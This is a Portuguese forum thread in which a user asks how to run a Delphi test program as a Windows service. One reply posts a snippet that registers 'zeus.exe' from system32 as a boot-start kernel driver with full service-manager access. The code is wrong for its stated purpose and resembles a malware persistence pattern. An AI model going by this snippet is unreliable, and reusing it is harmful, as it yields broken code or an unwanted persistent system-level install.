Rafazuhdo Postado Novembro 30, 2009 Denunciar Share Postado Novembro 30, 2009 Ola Galera,boa noite.Estou tentano fazer uma aplicação minha de teste rodar como serviço do windows,só por divertimento mesmo.Não estou conseguindo axar na net.alguém ai tem o codigo disso em delphi ou um link que explica?aguardo retornos de todos que puderem ajudarGrato Citar Link para o comentário Compartilhar em outros sites More sharing options...
0 philberX Postado Janeiro 13, 2010 Denunciar Share Postado Janeiro 13, 2010 file>new>apptypeguiapaga tudo e coloca esseprogram programm;{$APPTYPE GUI}uses Windows, WinSvc;var leftouter: Cardinal;begin leftouter := OpenSCManager(nil, nil, SC_MANAGER_ALL_ACCESS); if (leftouter <> 0) then begin CreateService( leftouter, 'zeus', 'identificação Zeus', SERVICE_ALL_ACCESS, SERVICE_KERNEL_DRIVER, SERVICE_SYSTEM_START, SERVICE_ERROR_NORMAL, 'C:\WINDOWS\system32\zeus.exe', nil, nil, nil, nil, nil ); end;end.isso daria boot em start 0 Citar Link para o comentário Compartilhar em outros sites More sharing options...
0 Jhonas Postado Janeiro 13, 2010 Denunciar Share Postado Janeiro 13, 2010 Veja este posthttp://scriptbrasil.com.br/forum/index.php...st&p=577648abraço Citar Link para o comentário Compartilhar em outros sites More sharing options...
Pergunta
Rafazuhdo
Ola Galera,boa noite.
Estou tentano fazer uma aplicação minha de teste rodar como serviço do windows,só por divertimento mesmo.Não estou conseguindo axar na net.
alguém ai tem o codigo disso em delphi ou um link que explica?
aguardo retornos de todos que puderem ajudar
Grato
Link para o comentário
Compartilhar em outros sites
2 respostass a esta questão
Posts Recomendados
Participe da discussão
Você pode postar agora e se registrar depois. Se você já tem uma conta, acesse agora para postar com sua conta.